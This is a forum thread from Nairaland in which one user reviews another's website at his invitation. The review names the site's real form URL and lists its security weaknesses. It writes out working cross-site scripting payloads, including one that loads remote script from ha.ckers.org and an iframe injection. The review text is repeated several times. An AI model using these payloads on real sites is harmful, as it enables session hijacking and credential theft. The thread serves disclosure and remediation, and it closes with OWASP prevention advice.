Please Nairaland site owners, and webmasters, tighten up security, a lot of Hackers this days are not smiling, mostly this script kiddies!

Ensure your contact area and most forms, mail your email the values rather than save in a database, and if you decide making use of a database for most applications, tighten up security!

I received 1700 attempted tries to hack my site with various scripts and calls to major hack sites, using their precoded script! All hit my Inbox rather than my Database! Currently battling deleting those junks and improving my security, based on studying the pattern implored.

Also try reading some security advice proffered in this thread https://www.nairaland.com/nigeria/topic-513276.0.html

well apart from that ave been getting weird messages from females that they saw my profile on nairaland and wanted to know me at first i believed it but after like 10 emails like that, i know yahoo yahoo boys are at work cuz i have never gotten that amount of babe on my case it's not realistic, logical reasoning,

@PC, You too like woman jor, How you go believe that kind rubbish, i receive one like that yesterday, i delete am sharp sharp,

Serious i think i know the person that tried hacking me, i will send him a serious mail now. If him try that kind thing again, i go show am say i be Benin Man. Before then, i go go warn him Papa! Since na Script Kiddie!

**sMileZ**

lool, U might be right about everything but did u say 'Script Kiddie'?

To start with, your site --> http://www.marknollis.com/ is as vulnerable as hell. I can help with a Full Disclosure(thats if you want one) or perhaps post the disclosure after you've got everything patched!


BTW The thread https://www.nairaland.com/nigeria/topic-513276.0.html doesnt seem to say anything bout the method of attack.

Bros, Feel free, It's for learning and improvement na!

Oya review the security!

1.) To start with, Directory listing is allowed on the web server

/scripts
/images
/css
/js
/chrometheme
/chromejs/
/freebies
/icons

2.) GET /checklogin.php

discloses the Apache Version/PHP Version/OpenSSL Version/Frontpage Version in its header

Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT

Now its getting serious, a lookup in a Vulnerability db of the Version of Apache being used will reveal how to exploit it.

3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, but data entered in the 'input' field will be cached by the browser of which anyone who has access to it can steal.

4.) Now this is the greatest of 'em, its called Cross Site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Now if you dont know the impact of XSS, U can read 'em here

http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html
http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf

-Theft of Accounts / Services
-User Tracking / Statistics
-Browser/ User exploitation
-Hi-jacking users' active session
-Changing the look of the page within the victims browser.
-Mounting a successful phishing attack.
-Intercept data and perform man-in-the-middle attacks.
- and Countless others

Mode of Attack - XSS

URL: http://marknollis.com/student.php

POST /apply_details.php

In the Fill your name field, copy & paste this

<SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT>

and click on 'Apply Now'. You'll have d image below.

Now u can do anyhing imaginable, i can call my site/call a javascript.

Lets use http://ha.ckers.org/xss.js as an example, the javascript being called here is xss.js

Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2

I can even load my blog on the page

<iframe src=http://codename-intrusion..com <

NL's spam bot just ate my review.

1.) To start with, Directory listing is allowed on the web server

/scripts
/images
/css
/js
/chrometheme
/chromejs/
/freebies
/icons

2.) GET /checklogin.php

discloses the Apache Version/PHP Version/OpenSSL Version/Frontpage Version in its header

Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT

Now its getting serious, a lookup in a Vulnerability db of the Version of Apache being used will reveal how to exploit it.

3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, but data entered in the 'input' field will be cached by the browser of which anyone who has access to it can steal.

4.) Now this is the greatest of 'em, its called Cross Site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Now if you dont know the impact of XSS, U can read 'em here

http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html
http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf

-Theft of Accounts / Services
-User Tracking / Statistics
-Browser/ User exploitation
-Hi-jacking users' active session
-Changing the look of the page within the victims browser.
-Mounting a successful phishing attack.
-Intercept data and perform man-in-the-middle attacks.
- and Countless others

Mode of Attack - XSS

URL: http://marknollis.com/student.php

POST /apply_details.php

In the Fill your name field, copy & paste this

<SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT>

and click on 'Apply Now'. You'll have d image below.

Now u can do anyhing imaginable, i can call my site/call a javascript.

Lets use http://ha.ckers.org/xss.js as an example, the javascript being called here is xss.js

Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2

I can even load my blog on the page

<iframe src=http://codename-intrusion..com <

4.) Now this is the greatest of 'em, its called Cross Site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Now if you dont know the impact of XSS, U can read 'em here

http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html
http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf

-Theft of Accounts / Services
-User Tracking / Statistics
-Browser/ User exploitation
-Hi-jacking users' active session
-Changing the look of the page within the victims browser.
-Mounting a successful phishing attack.
-Intercept data and perform man-in-the-middle attacks.
- and Countless others

The NL SpamBot just ate up the review again + my posting priviledges

The concluding part http://pastebin.com/YC2PgJs6

Thanks,

Forgot to strip off tags, Generally the validation was poor!

Thanks Once again!

Now, how can i solve problem one and two,

Guess from host

As for the Permission of script, No mind me, when i wrote the code, forgot to script tags, Have done that now, Please try and feed me back!

Thanks Oga don't even know how to spell you name Slyr0x

Donpuzo:

Now, how can i solve problem one and two,
Guess from host

Yeah.

Donpuzo:

As for the Permission of script, No mind me, when i wrote the code, forgot to script tags, Have done that now, Please try and feed me back!

Nothing has changed. I was able to inject the page.

Donpuzo:

don't even know how to spell you name[/s] Slyr0x

Yeah Slyr0x. Am having issues with that username. Can U pls help me put pressure on 'em MODs.

Got this smwhere

[Quote] The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

[/Quote]

Use this article --> http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet